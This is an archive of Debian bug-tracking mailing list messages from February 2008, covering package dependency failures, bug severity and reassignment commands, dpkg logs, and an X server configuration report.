-	  mv debian/lib"$$INST"1.0-dev/usr/lib/$$INST/lib/shared/lib*.so.1.0 debian/lib"$$INST"1.0ldbl/usr/lib/$$INST/lib/shared/; \
-	  for LIB in `(cd debian/lib"$$INST"1.0ldbl/usr/lib/$$INST/lib/shared && ls lib*.so.*)`; do \
-	ln -s $$INST/lib/shared/$$LIB debian/lib"$$INST"1.0ldbl/usr/lib/$$LIB; \
+	  mv debian/lib"$$INST"1.0-dev/usr/lib/$$INST/lib/shared/lib*.so.1.0 debian/lib"$$INST"1.0gf/usr/lib/$$INST/lib/shared/; \
+	  for LIB in `(cd debian/lib"$$INST"1.0gf/usr/lib/$$INST/lib/shared && ls lib*.so.*)`; do \
+	ln -s $$INST/lib/shared/$$LIB debian/lib"$$INST"1.0gf/usr/lib/$$LIB; \
 	  done; \
 	done;\
 	)


signature.asc
Description: Digital signature


Bug#459281: Still present with recent gcj

2008-02-11 Thread Michael Koch
On Mon, Feb 04, 2008 at 10:19:26AM +0100, Vincent Fourmond wrote:
>   For information, libjfreechart-java still does not work with gcj
> 4.3-20080202-1.

I have tested 4.3-20080116-1 and 4.3-20080202-1 locally and both worked.
The generated image is slightly different to the one generated by SUN
but that was to be expected.

I wonder if you missed the libgcj9-0-awt package in your installation?


Cheers,
Michael



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Processed: Re: Bug#465276: missing init script

2008-02-11 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> severity 465276 important
Bug#465276: missing init script
Severity set to `important' from `serious'

> thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#465241: bibtex2html has been installed with an unmet dependency

2008-02-11 Thread Julien Cristau
reassign 465241 aptitude
kthxbye

On Mon, Feb 11, 2008 at 17:12:09 +0100, Vincent Lefevre wrote:

> reopen 465241
> thanks
> 
> On 2008-02-11 15:41:43 +0100, Julien Cristau wrote:
> > On Mon, Feb 11, 2008 at 12:29:36 +0100, Vincent Lefevre wrote:
> > > Note: I'm not sure whether this is a bug in bibtex2html 1.90-2 or in
> > > dpkg.
> > > 
> > Package dependencies are supposed to be checked by the package manager,
> > not the package being installed.  However you don't provide a log of how
> > you installed the new bibtex2html, so I don't think it's possible to
> > debug this.
> 
> OK, here are the dpkg and aptitude logs:
> 
Thanks, reassigning to aptitude.

Cheers,
Julien



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#465276: missing init script

2008-02-11 Thread Daniel Baumann
severity 465276 important
thanks

[EMAIL PROTECTED] wrote:
> Without running vmware-guestd some important functions of the Virtual
> Infrastructur Client are not available.

this is not a serious bug. and yes, i'll add one soon.

-- 
Address:Daniel Baumann, Burgunderstrasse 3, CH-4562 Biberist
Email:  [EMAIL PROTECTED]
Internet:   http://people.panthera-systems.net/~daniel-baumann/



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Processed: Re: Bug#465241: bibtex2html has been installed with an unmet dependency

2008-02-11 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> reassign 465241 aptitude
Bug#465241: bibtex2html has been installed with an unmet dependency
Bug reassigned from package `bibtex2html' to `aptitude'.

> kthxbye
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#465230: cannot install package

2008-02-11 Thread Rubén Porras
2008/2/11, Joachim Breitner <[EMAIL PROTECTED]>:
> Hi,
>
> sorry for the bug, it was a little mistake with the dependencies. Fixed
> version is being uploaded.
>
> If you have trouble removing the package, try to remove
> the /lib/dpkg/info/libghc6-xmonad-contrib-dev.postrm file before trying
> to remove it, it might help.
>

I think they are still wrong, there is no xmonad-contrib-0.6 provided
by the xmonad-contrib source package.

The output now is:

(Reading database ... 189883 files and directories currently installed.)
Preparing to replace libghc6-xmonad-contrib-dev 0.6-1 (using
.../libghc6-xmonad-contrib-dev_0.6-2_i386.deb) ...
ghc-pkg: cannot find package xmonad-contrib-0.6
dpkg: warning - old pre-removal script returned error exit status 1
dpkg - trying script from the new package instead ...
ghc-pkg: cannot find package xmonad-contrib-0.6
dpkg: error processing /tmp/libghc6-xmonad-contrib-dev_0.6-2_i386.deb
(--install):
 subprocess new pre-removal script returned error exit status 1
Reading package info from stdin ... done.
ghc-pkg: dependency X11-1.4.1 doesn't exist (use --force to override)
dpkg: error while cleaning up:
 subprocess post-installation script returned error exit status 1
Errors were encountered while processing:
 /tmp/libghc6-xmonad-contrib-dev_0.6-2_i386.deb



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Processed: Re: Bug#465241: bibtex2html has been installed with an unmet dependency

2008-02-11 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> reopen 465241
Bug#465241: bibtex2html has been installed with an unmet dependency
Bug reopened, originator not changed.

> thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#465241: bibtex2html has been installed with an unmet dependency

2008-02-11 Thread Vincent Lefevre
reopen 465241
thanks

On 2008-02-11 15:41:43 +0100, Julien Cristau wrote:
> On Mon, Feb 11, 2008 at 12:29:36 +0100, Vincent Lefevre wrote:
> > Note: I'm not sure whether this is a bug in bibtex2html 1.90-2 or in
> > dpkg.
> > 
> Package dependencies are supposed to be checked by the package manager,
> not the package being installed.  However you don't provide a log of how
> you installed the new bibtex2html, so I don't think it's possible to
> debug this.

OK, here are the dpkg and aptitude logs:

2008-02-11 12:15:41 upgrade file 4.23-1 4.23-2
2008-02-11 12:15:41 status half-configured file 4.23-1
2008-02-11 12:15:41 status unpacked file 4.23-1
2008-02-11 12:15:41 status half-installed file 4.23-1
2008-02-11 12:15:42 status half-installed file 4.23-1
2008-02-11 12:15:42 status unpacked file 4.23-2
2008-02-11 12:15:42 status unpacked file 4.23-2
2008-02-11 12:15:42 upgrade libmagic1 4.23-1 4.23-2
2008-02-11 12:15:42 status half-configured libmagic1 4.23-1
2008-02-11 12:15:42 status unpacked libmagic1 4.23-1
2008-02-11 12:15:42 status half-installed libmagic1 4.23-1
2008-02-11 12:15:42 status half-installed libmagic1 4.23-1
2008-02-11 12:15:42 status unpacked libmagic1 4.23-2
2008-02-11 12:15:42 status unpacked libmagic1 4.23-2
2008-02-11 12:15:42 upgrade bibtex2html 1.90-1 1.90-2
2008-02-11 12:15:42 status half-configured bibtex2html 1.90-1
2008-02-11 12:15:42 status unpacked bibtex2html 1.90-1
2008-02-11 12:15:42 status half-installed bibtex2html 1.90-1
2008-02-11 12:15:42 status half-installed bibtex2html 1.90-1
2008-02-11 12:15:42 status unpacked bibtex2html 1.90-2
2008-02-11 12:15:42 status unpacked bibtex2html 1.90-2
2008-02-11 12:15:42 upgrade dblatex 0.2.8-5 0.2.8-6
2008-02-11 12:15:42 status half-configured dblatex 0.2.8-5
2008-02-11 12:15:43 status unpacked dblatex 0.2.8-5
2008-02-11 12:15:43 status half-installed dblatex 0.2.8-5
2008-02-11 12:15:43 status half-installed dblatex 0.2.8-5
2008-02-11 12:15:43 status unpacked dblatex 0.2.8-6
2008-02-11 12:15:43 status unpacked dblatex 0.2.8-6
2008-02-11 12:15:43 upgrade libcurses-perl 1.20-1 1.20-2
2008-02-11 12:15:43 status half-configured libcurses-perl 1.20-1
2008-02-11 12:15:43 status unpacked libcurses-perl 1.20-1
2008-02-11 12:15:43 status half-installed libcurses-perl 1.20-1
2008-02-11 12:15:43 status half-installed libcurses-perl 1.20-1
2008-02-11 12:15:43 status unpacked libcurses-perl 1.20-2
2008-02-11 12:15:43 status unpacked libcurses-perl 1.20-2
2008-02-11 12:15:43 upgrade libxml-libxml-perl 1.63-1.1 1.66-1
2008-02-11 12:15:43 status half-configured libxml-libxml-perl 1.63-1.1
2008-02-11 12:15:44 status unpacked libxml-libxml-perl 1.63-1.1
2008-02-11 12:15:44 status half-installed libxml-libxml-perl 1.63-1.1
2008-02-11 12:15:44 status half-installed libxml-libxml-perl 1.63-1.1
2008-02-11 12:15:44 status unpacked libxml-libxml-perl 1.66-1
2008-02-11 12:15:44 status unpacked libxml-libxml-perl 1.66-1
2008-02-11 12:15:44 upgrade ssl-cert 1.0.14 1.0.15
2008-02-11 12:15:44 status half-configured ssl-cert 1.0.14
2008-02-11 12:15:44 status unpacked ssl-cert 1.0.14
2008-02-11 12:15:44 status half-installed ssl-cert 1.0.14
2008-02-11 12:15:44 status half-installed ssl-cert 1.0.14
2008-02-11 12:15:44 status unpacked ssl-cert 1.0.15
2008-02-11 12:15:44 status unpacked ssl-cert 1.0.15
2008-02-11 12:15:44 upgrade grub-rescue-pc 1.96+20080209-1 1.96+20080210-1
2008-02-11 12:15:44 status half-configured grub-rescue-pc 1.96+20080209-1
2008-02-11 12:15:44 status unpacked grub-rescue-pc 1.96+20080209-1
2008-02-11 12:15:44 status half-installed grub-rescue-pc 1.96+20080209-1
2008-02-11 12:15:44 status half-installed grub-rescue-pc 1.96+20080209-1
2008-02-11 12:15:44 status unpacked grub-rescue-pc 1.96+20080210-1
2008-02-11 12:15:44 status unpacked grub-rescue-pc 1.96+20080210-1
2008-02-11 12:15:44 upgrade libnss-ldap 258-1+b1 259-1
2008-02-11 12:15:44 status half-configured libnss-ldap 258-1+b1
2008-02-11 12:15:44 status unpacked libnss-ldap 258-1+b1
2008-02-11 12:15:44 status half-installed libnss-ldap 258-1+b1
2008-02-11 12:15:45 status half-installed libnss-ldap 258-1+b1
2008-02-11 12:15:45 status unpacked libnss-ldap 259-1
2008-02-11 12:15:45 status unpacked libnss-ldap 259-1
2008-02-11 12:15:45 upgrade libpam-ldap 184-2+b1 184-3
2008-02-11 12:15:45 status half-configured libpam-ldap 184-2+b1
2008-02-11 12:15:45 status unpacked libpam-ldap 184-2+b1
2008-02-11 12:15:45 status half-installed libpam-ldap 184-2+b1
2008-02-11 12:15:45 status half-installed libpam-ldap 184-2+b1
2008-02-11 12:15:45 status unpacked libpam-ldap 184-3
2008-02-11 12:15:45 status unpacked libpam-ldap 184-3
2008-02-11 12:15:46 status unpacked libmagic1 4.23-2
2008-02-11 12:15:46 status half-configured libmagic1 4.23-2
2008-02-11 12:15:46 status installed libmagic1 4.23-2
2008-02-11 12:15:46 status unpacked file 4.23-2
2008-02-11 12:15:46 status unpacked file 4.23-2
2008-02-11 12:15:46 status unpacked file 4.23-2
2008-02-11 12:15:46 status half-configured file 4.23-2
2008-02-11 12:15

Bug#464953: Fix released

2008-02-11 Thread Asheesh Laroia
See 
http://lists.debian.org/debian-security-announce/debian-security-announce-2008/msg00056.html 
.


apt-get your way to the beautiful fixed future.

-- Asheesh.

--
You may worry about your hair-do today, but tomorrow much peanut butter will
be sold.



--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#465230: marked as done (cannot install package)

2008-02-11 Thread Debian Bug Tracking System

Your message dated Mon, 11 Feb 2008 16:02:14 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#465230: fixed in xmonad-contrib 0.6-2
has caused the Debian Bug report #465230,
regarding cannot install package
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
465230: http://bugs.debian.org/cgi-bin//465230
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: libghc6-xmonad-contrib-dev
Version: 0.6-1
Severity: serious

Setting up libghc6-xmonad-contrib-dev (0.6-1) ...
Reading package info from stdin ... done.
ghc-pkg: dependency X11-1.4.1 doesn't exist (use --force to override)
dpkg: error processing libghc6-xmonad-contrib-dev (--configure):
 subprocess post-installation script returned error exit status 1
dpkg: dependency problems prevent configuration of libghc6-xmonad-contrib-prof:
 libghc6-xmonad-contrib-prof depends on libghc6-xmonad-contrib-dev; however:
  Package libghc6-xmonad-contrib-dev is not configured yet.
dpkg: error processing libghc6-xmonad-contrib-prof (--configure):
 dependency problems - leaving unconfigured
Errors were encountered while processing:
 libghc6-xmonad-contrib-dev
 libghc6-xmonad-contrib-prof
E: Sub-process /usr/bin/dpkg returned an error code (1)
A package failed to install.  Trying to recover:
Setting up libghc6-xmonad-contrib-dev (0.6-1) ...
Reading package info from stdin ... done.
ghc-pkg: dependency X11-1.4.1 doesn't exist (use --force to override)
dpkg: error processing libghc6-xmonad-contrib-dev (--configure):
 subprocess post-installation script returned error exit status 1
dpkg: dependency problems prevent configuration of libghc6-xmonad-contrib-prof:
 libghc6-xmonad-contrib-prof depends on libghc6-xmonad-contrib-dev; however:
  Package libghc6-xmonad-contrib-dev is not configured yet.
dpkg: error processing libghc6-xmonad-contrib-prof (--configure):
 dependency problems - leaving unconfigured
Errors were encountered while processing:
 libghc6-xmonad-contrib-dev
 libghc6-xmonad-contrib-prof


--- End Message ---
--- Begin Message ---
Source: xmonad-contrib
Source-Version: 0.6-2

We believe that the bug you reported is fixed in the latest version of
xmonad-contrib, which is due to be installed in the Debian FTP archive:

libghc6-xmonad-contrib-dev_0.6-2_i386.deb
  to pool/main/x/xmonad-contrib/libghc6-xmonad-contrib-dev_0.6-2_i386.deb
libghc6-xmonad-contrib-doc_0.6-2_all.deb
  to pool/main/x/xmonad-contrib/libghc6-xmonad-contrib-doc_0.6-2_all.deb
libghc6-xmonad-contrib-prof_0.6-2_i386.deb
  to pool/main/x/xmonad-contrib/libghc6-xmonad-contrib-prof_0.6-2_i386.deb
xmonad-contrib_0.6-2.diff.gz
  to pool/main/x/xmonad-contrib/xmonad-contrib_0.6-2.diff.gz
xmonad-contrib_0.6-2.dsc
  to pool/main/x/xmonad-contrib/xmonad-contrib_0.6-2.dsc



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Joachim Breitner <[EMAIL PROTECTED]> (supplier of updated xmonad-contrib 
package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.7
Date: Mon, 11 Feb 2008 16:39:49 +0100
Source: xmonad-contrib
Binary: libghc6-xmonad-contrib-dev libghc6-xmonad-contrib-prof 
libghc6-xmonad-contrib-doc
Architecture: source i386 all
Version: 0.6-2
Distribution: unstable
Urgency: low
Maintainer: Joachim Breitner <[EMAIL PROTECTED]>
Changed-By: Joachim Breitner <[EMAIL PROTECTED]>
Description: 
 libghc6-xmonad-contrib-dev - Extensions to xmonad
 libghc6-xmonad-contrib-doc - Extensions to xmonad; documentation
 libghc6-xmonad-contrib-prof - Extensions to xmonad; profiling libraries
Closes: 465230
Changes: 
 xmonad-contrib (0.6-2) unstable; urgency=low
 .
   * Fix versioned dependency on libghc6-x11-dev (instead libx11-dev)
 (Closes: 465230)
   * Update copyright file
Files: 
 38a2c0a35c5869c66579001fd87a29ca 1198 x11 optional xmonad-contrib_0.6-2.dsc
 b0dd84abd76d3be3300e606fb06851e8 6000 x11 optional xmonad-contrib_0.6-2.diff.gz
 a10d7c58793cb3ce69ba9886232ce637 1868542 libdevel optional 
libghc6-xmonad-contrib-dev_0.6-2_i386.deb
 3697a825532e2be80e7f48ed7a6e2fe1 2030060 libdevel optional 
libghc6-xmonad-contrib-prof_0.6-2_i386.deb
 f17a8ce9a4b8a1ff2d184363ca1c4978 354502 doc optional 
libghc6-xmonad-contrib-doc_0.6-2_all.deb

-

Bug#465276: missing init script

2008-02-11 Thread d . gobbers
Package: open-vm-tools
Severity: serious

The package is missing an init script to start the vmware-guestd 
automatically on system boot.


Without running vmware-guestd some important functions of the Virtual 
Infrastructur Client are not available.


Thanks in advance, Dieter Gobbers
-- 
Sicherheit - Verfügbarkeit - Kontinuität

IT-Service-Management von

ScanPlus GmbH   Tel.  +49 731 92013 113
Lise-Meitner-Str. 5 Fax.  +49 731 92013 290
D-89081 Ulm, Germany 
Web: http://www.scan-plus.de/   Mail: [EMAIL PROTECTED]

Amtsgericht Ulm HRB 3220 
Geschäftsführung:   Jürgen Hörmann, Andreas Werther


Bug#464951: twoftpd-run can't be removed: unable to open supervise/ok: file does not exist

2008-02-11 Thread Gerrit Pape
On Sat, Feb 09, 2008 at 07:01:48PM -0600, Raphael Geissert wrote:
> Hello,
> 
> Looking for a simple ftp server/daemon I installed twoftpd-run but after 
> being 
> disappointed by its configuration system I decided to remove it.
> 
> At installation time the postinst script already cause some troubles:
> > ...
> > Warning: The home dir /var/ftp you specified can't be accessed: No such
> > file or directory
> > ...
> 
> But while removing:
> > Removing twoftpd-run ...
> > Stopping service twoftpd... warning: .: unable to open supervise/ok: file
> > does not exist dpkg: error processing twoftpd-run (--purge):
> >  subprocess pre-removal script returned error exit status 1
> > dpkg: twoftpd: dependency problems, but removing anyway as you request:
> >  twoftpd-run depends on twoftpd.
> > Removing twoftpd ...
> > Errors were encountered while processing:
> >  twoftpd-run
> > E: Sub-process /usr/bin/dpkg returned an error code (1)
> 
> I've been able to reproduce this problem when performing a piuparts check on 
> sid. I'm attaching piupart's output.

Hi Raphael, this can happen if the runit package hasn't been installed
properly, I don't know about your system, but while piuparts check I
guess adding an entry to /etc/inittab and doing kill -HUP 1 doesn't
start the corresponding process in the piuparts chroot environment.

On your system, do you use something different than sysvinit?  Do you
know why the inittab entry added by runit didn't come into effect?

Regards, Gerrit.



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Processed: No reason to keep debmirror out of testing

2008-02-11 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> tags 449350 unreproducible
Bug#449350: debmirror: md5sum failure disallows downloads
There were no tags set.
Tags added: unreproducible

> severity 449350 normal
Bug#449350: debmirror: md5sum failure disallows downloads
Severity set to `normal' from `grave'

> thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#449350: No reason to keep debmirror out of testing

2008-02-11 Thread Alexander E. Patrakov

tags 449350 unreproducible
severity 449350 normal
thanks

Hello Luk,

you have blocked debmirror out of testing due to bug #449350. However, 
with a fully up-to-date Lenny install, I can't reproduce the bug (even 
the original testcase), and therefore it definitely doesn't make the 
package unusable for me. The original submitter did find a workaround, 
so the package isn't unusable for him, too. Thus, the bug is either not 
RC at all, or belongs to a different package (and the proper title is 
"package ZZZ version YYY breaks debmirror"). Please reconsider your 
decision to block the package from testing.


$ /usr/bin/debmirror \
>  --verbose --host=ftp.debian.org \
>  --root=debian/ --method=http --progress \
>  --passive --dist=sid --arch=none \
>  --ignore-release-gpg --section=main \
>  --pdiff=none \
>  /home/mirror/sid
Mirroring to /home/mirror/sid from http://ftp.debian.org/debian//
Arches:
Dists: sid
Sections: main
Including source.
Passive mode on.
Will clean up AFTER mirroring.
Pdiff mode: none.
Attempting to get lock, this might take 2 minutes before it fails.
Get Release files.
[0%] Getting: dists/sid/Release... ok
[0%] Getting: dists/sid/Release.gpg... ok
Get Packages and Sources files and other miscellany.
dists/sid/main/source/Sources.gz needs fetch
[  1%] Getting: dists/sid/main/source/Sources.gz... ok
dists/sid/main/source/Release needs fetch
[100%] Getting: dists/sid/main/source/Release... ok
Parse Packages and Sources files and add to the file list everything 
therein.

Download all files that we need to get (16765 MiB).
[  0%] Getting: pool/main/2/2vcard/2vcard_0.5-2.diff.gz... ok
[  0%] Getting: pool/main/2/2vcard/2vcard_0.5-2.dsc... ok
[  0%] Getting: pool/main/2/2vcard/2vcard_0.5.orig.tar.gz... ok
... so it works

-- System Information:
Debian Release: lenny/sid
 APT prefers testing
 APT policy: (500, 'testing')
Architecture: i386 (i686)

Kernel: Linux 2.6.22-3-686 (SMP w/2 CPU cores)
Locale: LANG=ru_RU.UTF-8, LC_CTYPE=ru_RU.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages debmirror depends on:
ii  bzip2 1.0.4-2high-quality block-sorting 
file co
ii  libcompress-zlib-perl 2.008-1Perl module for creation 
and manip
ii  libdigest-sha1-perl   2.11-2 NIST SHA-1 message digest 
algorith

ii  liblockfile-simple-perl   0.2.5-7Simple advisory file locking
ii  libwww-perl   5.808-1WWW client/server library 
for Perl
ii  perl [libdigest-md5-perl] 5.8.8-12   Larry Wall's Practical 
Extraction

ii  perl-modules [libnet-perl]5.8.8-12   Core Perl modules
ii  rsync 2.6.9-6fast remote file copy 
program (lik


Versions of packages debmirror recommends:
ii  ed0.7-1  The classic unix line editor
ii  gnupg 1.4.6-2+b1 GNU privacy guard - a free 
PGP rep
ii  patch 2.5.9-4Apply a diff file to an 
original


--
Alexander E. Patrakov




--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#465230: cannot install package

2008-02-11 Thread Joachim Breitner
Hi,

sorry for the bug, it was a little mistake with the dependencies. Fixed
version is being uploaded.

If you have trouble removing the package, try to remove
the /lib/dpkg/info/libghc6-xmonad-contrib-dev.postrm file before trying
to remove it, it might help.

Greetings,
Joachim

Am Montag, den 11.02.2008, 11:39 +0100 schrieb =?UTF-8?Q? Rub=C3=A9n?=
Porras:
> Package: libghc6-xmonad-contrib-dev
> Version: 0.6-1
> Severity: serious
> 
> Setting up libghc6-xmonad-contrib-dev (0.6-1) ...
> Reading package info from stdin ... done.
> ghc-pkg: dependency X11-1.4.1 doesn't exist (use --force to override)
> dpkg: error processing libghc6-xmonad-contrib-dev (--configure):
>  subprocess post-installation script returned error exit status 1
> dpkg: dependency problems prevent configuration of 
> libghc6-xmonad-contrib-prof:
>  libghc6-xmonad-contrib-prof depends on libghc6-xmonad-contrib-dev; however:
>   Package libghc6-xmonad-contrib-dev is not configured yet.
> dpkg: error processing libghc6-xmonad-contrib-prof (--configure):
>  dependency problems - leaving unconfigured
> Errors were encountered while processing:
>  libghc6-xmonad-contrib-dev
>  libghc6-xmonad-contrib-prof
> E: Sub-process /usr/bin/dpkg returned an error code (1)
> A package failed to install.  Trying to recover:
> Setting up libghc6-xmonad-contrib-dev (0.6-1) ...
> Reading package info from stdin ... done.
> ghc-pkg: dependency X11-1.4.1 doesn't exist (use --force to override)
> dpkg: error processing libghc6-xmonad-contrib-dev (--configure):
>  subprocess post-installation script returned error exit status 1
> dpkg: dependency problems prevent configuration of 
> libghc6-xmonad-contrib-prof:
>  libghc6-xmonad-contrib-prof depends on libghc6-xmonad-contrib-dev; however:
>   Package libghc6-xmonad-contrib-dev is not configured yet.
> dpkg: error processing libghc6-xmonad-contrib-prof (--configure):
>  dependency problems - leaving unconfigured
> Errors were encountered while processing:
>  libghc6-xmonad-contrib-dev
>  libghc6-xmonad-contrib-prof
> 
> 

-- 
Joachim "nomeata" Breitner
Debian Developer
  [EMAIL PROTECTED] | ICQ# 74513189 | GPG-Keyid: 4743206C
  JID: [EMAIL PROTECTED] | http://people.debian.org/~nomeata


signature.asc
Description: Dies ist ein digital signierter Nachrichtenteil


Processed: retitle 456264 to gcj: non-free man page included ..., user [EMAIL PROTECTED] ...

2008-02-11 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> # Automatically generated email from bts, devscripts version 2.10.15
> # Sorry...
> retitle 456264 gcj: non-free man page included
Bug#456264: [debuild] --lintian-opts doesn't work
Changed Bug title to `gcj: non-free man page included' from `[debuild] 
--lintian-opts doesn't work'.
(By the way, that Bug is currently marked as done.)

> retitle 465264 [debuild] --lintian-opts doesn't work
Bug#465264: [debuild] --lintian-opts doesn't work
Changed Bug title to `[debuild] --lintian-opts doesn't work' from `[debuild] 
--lintian-opts doesn't work'.

> user [EMAIL PROTECTED]
Setting user to [EMAIL PROTECTED] (was [EMAIL PROTECTED]).
> usertags 465264 debuild
Bug#465264: [debuild] --lintian-opts doesn't work
There were no usertags set.
Usertags are now: debuild.
>
End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#456264: retitle 456264 to gcj: non-free man page included ..., user [EMAIL PROTECTED] ...

2008-02-11 Thread Adam D . Barratt
# Automatically generated email from bts, devscripts version 2.10.15
# Sorry...
retitle 456264 gcj: non-free man page included
retitle 465264 [debuild] --lintian-opts doesn't work
user [EMAIL PROTECTED]
usertags 465264 debuild




-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Processed: Re: Bug#465268: xserver-xorg-video-intel: No display at all when switching to other VTs from X session

2008-02-11 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> severity 465268 important
Bug#465268: xserver-xorg-video-intel: No display at all when switching to other 
VTs from X session
Severity set to `important' from `serious'

> kthxbye
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#465268: xserver-xorg-video-intel: No display at all when switching to other VTs from X session

2008-02-11 Thread Frans Pop
Package: xserver-xorg-video-intel
Version: 2:2.2.0.90-3
Severity: serious

When I switch from my X session to other VTs, I get only a black screen.
Downgrading to 2:2.2.0-1 solved the issue.

I see in the BTS that other reports of VT switching issues were _solved_
in the newer versions, but for me the new version breaks things.

My graphics controller is:
00:02.0 VGA compatible controller [0300]: Intel Corporation 82945G/GZ
Integrated Graphics Controller [8086:2772] (rev 02)

Cheers,
FJP

-- Package-specific info:
Contents of /var/lib/x11/X.roster:
xserver-xorg

/var/lib/x11/X.md5sum does not exist.

X server symlink status:
lrwxrwxrwx 1 root root 13 2006-06-27 17:16 /etc/X11/X -> /usr/bin/Xorg
-rwxr-xr-x 1 root root 1831520 2008-02-01 06:08 /usr/bin/Xorg

Contents of /var/lib/x11/xorg.conf.roster:
xserver-xorg

VGA-compatible devices on PCI bus:
00:02.0 VGA compatible controller: Intel Corporation 82945G/GZ Integrated 
Graphics Controller (rev 02)

/etc/X11/xorg.conf does not match checksum in /var/lib/x11/xorg.conf.md5sum.

Xorg X server configuration file status:
-rw-r--r-- 1 root root 2230 2007-08-13 19:45 /etc/X11/xorg.conf

Contents of /etc/X11/xorg.conf:
# /etc/X11/xorg.conf (xorg X Window System server configuration file)
#
# This file was generated by dexconf, the Debian X Configuration tool, using
# values from the debconf database.
#
# Edit this file with caution, and see the /etc/X11/xorg.conf manual page.
# (Type "man /etc/X11/xorg.conf" at the shell prompt.)
#
# This file is automatically updated on xserver-xorg package upgrades *only*
# if it has not been modified since the last upgrade of the xserver-xorg
# package.
#
# If you have edited this file but would like it to be automatically updated
# again, run the following command:
#   sudo dpkg-reconfigure -phigh xserver-xorg

Section "InputDevice"
Identifier  "Generic Keyboard"
Driver  "kbd"
Option  "CoreKeyboard"
Option  "XkbRules"  "xorg"
Option  "XkbModel"  "pc104"
Option  "XkbLayout" "us"
EndSection

Section "InputDevice"
Identifier  "Configured Mouse"
Driver  "mouse"
Option  "CorePointer"
Option  "Device""/dev/input/mice"
Option  "Protocol"  "ExplorerPS/2"
#Option "Emulate3Buttons"   "true"
EndSection

Section "Device"
Identifier  "Generic Video Card"
Driver  "i810"
#BusID  "PCI:0:2:0"
#Driver "fglrx"
#BusID  "PCI:1:0:0"
EndSection

Section "Monitor"
Identifier  "Generic Monitor"
#Option "DPMS"
#HorizSync  30-95
#VertRefresh50-150
#DisplaySize360 270
EndSection

Section "Screen"
Identifier  "Default Screen"
Device  "Generic Video Card"
Monitor "Generic Monitor"
#DefaultDepth   24
#SubSection "Display"
#   Depth   1
#   Modes   "1024x768" "800x600" "720x400" "640x480"
#EndSubSection
#SubSection "Display"
#   Depth   4
#   Modes   "1024x768" "800x600" "720x400" "640x480"
#EndSubSection
#SubSection "Display"
#   Depth   8
#   Modes   "1024x768" "800x600" "720x400" "640x480"
#EndSubSection
#SubSection "Display"
#   Depth   15
#   Modes   "1024x768" "800x600" "720x400" "640x480"
#EndSubSection
#SubSection "Display"
#   Depth   16
#   Modes   "1024x768" "800x600" "720x400" "640x480"
#EndSubSection
#SubSection "Display"
#   Depth   24
#   Modes   "1280x1024" "1024x768" "800x600" "720x400" 
"640x480"
#EndSubSection
EndSection

Section "ServerLayout"
Identifier  "Default Layout"
Screen  "Default Screen"
InputDevice "Generic Keyboard"
InputDevice "Configured Mouse"
EndSection


Xorg X server log files on system:
-rw-r--r-- 1 root root 32981 2008-02-11 03:48 /var/log/Xorg.1.log
-rw-r--r-- 1 root root 37142 2008-02-11 15:36 /var/log/Xorg.0.log

